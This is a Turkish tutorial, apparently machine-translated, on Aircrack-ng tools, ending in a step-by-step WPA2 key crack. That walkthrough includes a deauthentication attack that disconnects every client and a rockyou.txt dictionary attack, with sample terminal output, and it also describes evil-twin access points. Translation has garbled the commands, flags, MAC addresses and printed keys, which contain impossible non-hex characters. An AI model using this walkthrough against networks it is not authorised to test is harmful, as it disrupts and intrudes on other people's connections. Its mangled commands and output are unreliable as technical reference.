Aircrack-ng Nasıl Kullanılır

How Use Aircrack Ng



Çoğu zaman insanlar bağlı oldukları ağı hiç düşünmezler. O ağın ne kadar güvenli olduğunu ve günlük olarak gizli verilerini ne kadar riske attıklarını asla düşünmezler. adlı çok güçlü bir araç kullanarak wifi ağlarınızda güvenlik açığı kontrolleri yapabilirsiniz. Aircrack-ng ve Wireshark. Wireshark, ağ etkinliğini izlemek için kullanılır. Aircrack-ng daha çok, Kablosuz bağlantılara erişim sağlamanıza izin veren agresif bir araç gibidir. Davetsiz misafir olarak düşünmek, kendinizi bir saldırıya karşı korumanın her zaman en güvenli yolu olmuştur. Bir davetsiz misafirin sisteminize erişim sağlamak için yapacağı eylemleri, hava korsanlığını öğrenerek tam olarak kavrayabilirsiniz. Daha sonra güvensiz olmadığından emin olmak için kendi sisteminizde uyumluluk kontrolleri yapabilirsiniz.

Aircrack-ng WiFi ağ güvenliğini test etmek için tasarlanmış eksiksiz bir yazılım setidir. Sadece tek bir araç değil, her biri belirli bir amaca hizmet eden bir araçlar topluluğudur. Erişim Noktasını izleme, test etme, ağa saldırma, wifi ağını kırma ve test etme gibi farklı wifi güvenliği alanları üzerinde çalışılabilir. Aircrack'in temel amacı, paketleri ele geçirmek ve şifreleri kırmak için karmaları deşifre etmektir. Neredeyse tüm yeni kablosuz arayüzleri destekler. Aircrack-ng eski bir araç takımı olan Aircrack'in geliştirilmiş bir versiyonudur. Yeni nesil . Daha büyük bir görevi üstlenmek için birlikte çalışan harika araçlardan bazıları.







Hava aracı:

Airmon-ng, ağ arayüz kartını monitör moduna yerleştiren aircrack-ng kitine dahildir. Ağ kartları genellikle yalnızca NIC'nin MAC adresi tarafından tanımlandığı şekilde kendileri için hedeflenen paketleri kabul eder, ancak airmon-ng ile, onlar için hedeflenmiş olsun ya da olmasın tüm kablosuz paketler de kabul edilecektir. Erişim noktasıyla bağlantı kurmadan veya kimlik doğrulaması yapmadan bu paketleri yakalayabilmelisiniz. Ağ arayüzünü monitör moduna alarak bir Erişim Noktasının durumunu kontrol etmek için kullanılır. Öncelikle kablosuz kartları monitör modunu açacak şekilde yapılandırmalı, ardından herhangi bir işlemin buna müdahale ettiğini düşünüyorsanız, tüm arka plan işlemlerini sonlandırmalısınız. İşlemler sonlandırıldıktan sonra kablosuz arayüz üzerinde aşağıdaki komut çalıştırılarak monitör modu etkinleştirilebilir:



[e-posta korumalı] :~$sudoairmon-ng başlangıç ​​wlan0#

Aşağıdaki komutu kullanarak herhangi bir zamanda airmon-ng'ı durdurarak monitör modunu devre dışı bırakabilirsiniz:

[e-posta korumalı] :~$sudoairmon-ng durdurma wlan0#

Hava yığını:

Airodump-ng, bizi çevreleyen tüm ağları listelemek ve onlar hakkında değerli bilgileri görüntülemek için kullanılır. Airodump-ng'nin temel işlevi paketleri koklamaktır, bu nedenle esasen monitör moduna alınırken etrafımızdaki tüm paketleri almak için programlanmıştır. Etrafımızdaki tüm bağlantılara karşı çalıştıracağız ve ağa bağlı istemci sayısı, bunlara karşılık gelen mac adresleri, şifreleme stili ve kanal adları gibi verileri toplayacağız ve ardından hedef ağımızı hedeflemeye başlayacağız.

airodump-ng komutunu yazıp parametre olarak ağ arayüz adını vererek bu aracı aktif hale getirebiliriz. Tüm erişim noktalarını, veri paketlerinin miktarını, kullanılan şifreleme ve kimlik doğrulama yöntemlerini ve ağın adını (ESSID) listeleyecektir. Bilgisayar korsanlığı açısından mac adresleri en önemli alanlardır.

[e-posta korumalı] :~$sudoairodump-ng wlx0mon

Hava çatlağı:

Aircrack şifre kırmak için kullanılır. Tüm paketleri airodump kullanarak yakaladıktan sonra aircrack ile anahtarı kırabiliriz. PTW ve FMS olmak üzere iki yöntemi kullanarak bu anahtarları kırar. PTW yaklaşımı iki aşamada yapılır. İlk başta, yalnızca ARP paketleri kullanılır ve ancak o zaman, aramadan sonra anahtar kırılmazsa, yakalanan diğer tüm paketleri kullanır. PTW yaklaşımının bir artı noktası, tüm paketlerin çatlama için kullanılmamasıdır. İkinci yaklaşımda, yani FMS, anahtarı kırmak için hem istatistiksel modelleri hem de kaba kuvvet algoritmalarını kullanırız. Bir sözlük yöntemi de kullanılabilir.

Yayın:

Airplay-ng, trafik oluşturmak veya hızlandırmak için paketleri kablosuz bir ağa sunar. İki farklı kaynaktan gelen paketler aireplay-ng ile yakalanabilir. Birincisi canlı ağ, ikincisi ise zaten var olan pcap dosyasındaki paketler. Airplay-ng, bir kablosuz erişim noktasını ve bir kullanıcıyı hedef alan bir kimlik doğrulama saldırısı sırasında kullanışlıdır. Ayrıca, müşterinin sisteminden bir anahtar almanızı sağlayan bir araç olan airplay-ng ile kahve latte saldırısı gibi bazı saldırılar gerçekleştirebilirsiniz. Bunu, bir ARP paketini yakalayıp onu manipüle ederek ve sisteme geri göndererek başarabilirsiniz. İstemci daha sonra airodump tarafından yakalanabilen bir paket oluşturacak ve aircrack bu değiştirilmiş paketten anahtarı kıracaktır. Airplay-ng'nin diğer bazı saldırı seçenekleri arasında chopchop, fragman arepreplay, vb.

Hava üssü:

Airbase-ng, bir davetsiz misafirin bilgisayarını, başkalarının bağlantı kurması için güvenliği ihlal edilmiş bir bağlantı noktasına dönüştürmek için kullanılır. Airbase-ng'yi kullanarak yasal bir erişim noktası olduğunuzu iddia edebilir ve ağınıza bağlı bilgisayarlara ortadaki adam saldırıları gerçekleştirebilirsiniz. Bu tür saldırılara Evil Twin Attacks denir. Temel kullanıcıların yasal erişim noktası ile sahte erişim noktası arasında ayrım yapması imkansızdır. Dolayısıyla, şeytani ikiz tehdidi, bugün karşılaştığımız en tehditkar kablosuz tehditler arasında yer alıyor.

Airolib-ng:

Airolib, şifre listelerini ve erişim noktasını saklayarak ve yöneterek bilgisayar korsanlığı sürecini hızlandırır. Bu program tarafından kullanılan veritabanı yönetim sistemi, çoğunlukla tüm platformlarda bulunan SQLite3'tür. Parola kırma, özel geçici anahtarın (PTK) ayıklandığı ikili ana anahtarın hesaplanmasını içerir. PTK'yı kullanarak, belirli bir paket için çerçeve mesajı tanımlama kodunu (MIC) belirleyebilir ve MIC'in pakete benzer olduğunu teorik olarak bulabilirsiniz, yani PTK doğruysa PMK da haklıydı.

Veritabanında depolanan parola listelerini ve erişim ağlarını görmek için aşağıdaki komutu yazın:

[e-posta korumalı] :~$sudoairolib-ng testveritabanı – istatistikler

Burada testdatabase, erişmek veya oluşturmak istediğiniz db'dir ve –stats, üzerinde gerçekleştirmek istediğiniz işlemdir. Bazı SSID'lere veya başka bir şeye maksimum öncelik vermek gibi, veritabanı alanlarında birden çok işlem yapabilirsiniz. airolib-ng'yi aircrack-ng ile kullanmak için aşağıdaki komutu girin:

[e-posta korumalı] :~$sudoaircrack-ng-rtestveritabanı wpa2.eapol.cap

Burada önceden hesaplanmış PMK'ları kullanıyoruz. veritabanı testi şifre kırma sürecini hızlandırmak için.

Aircrack-ng kullanarak WPA/WPA2 kırma:

Haydi, aircrack-ng'nin birkaç harika aracının yardımıyla neler yapabileceğine dair küçük bir örneğe bakalım. Bir WPA/WPA2 ağının önceden paylaşılan anahtarını bir sözlük yöntemi kullanarak kıracağız.

Yapmamız gereken ilk şey, monitör modunu destekleyen ağ arayüzlerini listelemek. Bu, aşağıdaki komut kullanılarak yapılabilir:

[e-posta korumalı] :~$sudoairmon-ng

PHY Arabirim Sürücü Yonga Seti

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Bir arayüz görebiliriz; şimdi bulduğumuz ağ arayüzünü ( wlx0 ) aşağıdaki komutu kullanarak monitör moduna almamız gerekiyor:

[e-posta korumalı] :~$sudoairmon-ng start wlx0

adlı arayüzde monitör modunu etkinleştirdi. wlx0mon .

Şimdi monitör moduna aldığımız ağ arayüzümüz üzerinden yakındaki yönlendiricilerin yayınlarını dinlemeye başlamalıyız.

[e-posta korumalı] :~$sudoairodump-ng wlx0mon

CH5 ][Geçen:30s][ 2020-12-02 00:17



BSSID PWR İşaretleri#Data, #/s CH MB ENC ŞİFRE YETKİLENDİRMESİ ESSID



E4: 6F:13: 04: CE:31 -Dört beş 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:84:76:10:OLMAK-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:VERİR:88:FA:38: 02-68 28 2 0 on bir54e WPA2 CCMP PSK TP-Link_3802



BSSID İSTASYON PWR Hız Kayıp Çerçeve Probu



E4: 6F:13: 04: CE:315C:3A:Dört beş: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31M.Ö:91:B5:F8:7E:D5 -390e-1 1002 13

Hedef ağımız kraker bu durumda, şu anda kanal 1'de çalışıyor.

Burada hedef ağın şifresini kırmak için, bir cihaz bir ağa bağlanmaya çalıştığında meydana gelen 4 yönlü bir el sıkışma yakalamamız gerekiyor. Aşağıdaki komutu kullanarak onu yakalayabiliriz:

[e-posta korumalı] :~$sudoairodump-ng-C 1--bssid E4: 6F:13: 04: CE:31 -içinde /ev wlx0

-C : Kanal

–Bs : Hedef ağın Bssid'si

-içinde : pcap dosyasının yerleştirileceği dizinin adı

Şimdi bir cihazın ağa bağlanmasını beklememiz gerekiyor, ancak bir el sıkışmasını yakalamanın daha iyi bir yolu var. Aşağıdaki komutu kullanarak bir deauthentication saldırısı kullanarak cihazların AP'ye yetkilerini devre dışı bırakabiliriz:

[e-posta korumalı] :~$sudoairplay-ng-0 -ileE4: 6F:13: 04: CE:31

ile : Hedef ağın Bssid'si

-0 : kimlik doğrulama saldırısı

Tüm cihazların bağlantısını kestik ve şimdi bir cihazın ağa bağlanmasını beklememiz gerekiyor.

CH1 ][Geçen:30s][ 2020-12-02 00:02][WPA anlaşması: E4: 6F:13: 04: CE:31



BSSID PWR RXQ İşaretleri#Veri, #/s CH MB ENC ŞİFRE KİMLİK E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID İSTASYON PWR Hız Kayıp Çerçeve Probu



E4: 6F:13: 04: CE:31M.Ö:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C:3A:Dört beş: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -37 0- 1e0 1

Bir vuruş aldık ve saatin hemen yanında sağ üst köşeye baktığımızda bir el sıkışmanın yakalandığını görebiliyoruz. Şimdi belirtilen klasöre bakın ( /ev bizim durumumuzda) bir .pcap dosya.

WPA anahtarını kırmak için aşağıdaki komutu kullanabiliriz:

[e-posta korumalı] :~$sudoaircrack-ng-a2 -içinderockyou.txt-BE4: 6F:13: 04: CE:31el sıkışma.kap

b :Hedef ağın Bssid'si

-a2 :WPA2 modu

Rockyou.txt: Sözlükdosyakullanılmış

Handshake.cap: Thedosya Hangiyakalanan el sıkışma içerir

Aircrack-ng1.2beta3

[00:01:49] 10566anahtarlar test edildi(1017.96ile/s)

ANAHTAR BULUNDU! [beni yakaladın]

Ana Anahtar : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FelliC


Geçici Anahtar : 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FelliC025 62E9 5D71

Hedef ağımızın anahtarı başarıyla kırıldı.

Çözüm:

Akıllı telefon kullanan işçilerden endüstriyel kontrol cihazlarına kadar her şirket tarafından kullanılan kablosuz ağlar her yerdedir. Araştırmalara göre 2021'de internet trafiğinin neredeyse yüzde 50'sinden fazlası WiFi üzerinden olacak. Kablosuz ağların birçok avantajı var, kapıların dışında iletişim, kablo döşemenin neredeyse imkansız olduğu yerlerde hızlı internet erişimi, kablo döşemeden ağı genişletebilir ve siz yokken mobil cihazlarınızı ev ofislerinize kolayca bağlayabilirsiniz.

Bu avantajlara rağmen gizliliğiniz ve güvenliğiniz konusunda büyük bir soru işareti bulunmaktadır. Bu ağlar olarak; İletim aralığındaki yönlendiriciler herkese açıktır, kolayca saldırıya uğrayabilir ve verileriniz kolayca tehlikeye girebilir. Örneğin, halka açık bir kablosuz ağa bağlıysanız, bu ağa bağlı herhangi biri, bir miktar zekayı ve mevcut harika araçların yardımıyla ağ trafiğinizi kolayca kontrol edebilir ve hatta boşaltabilir.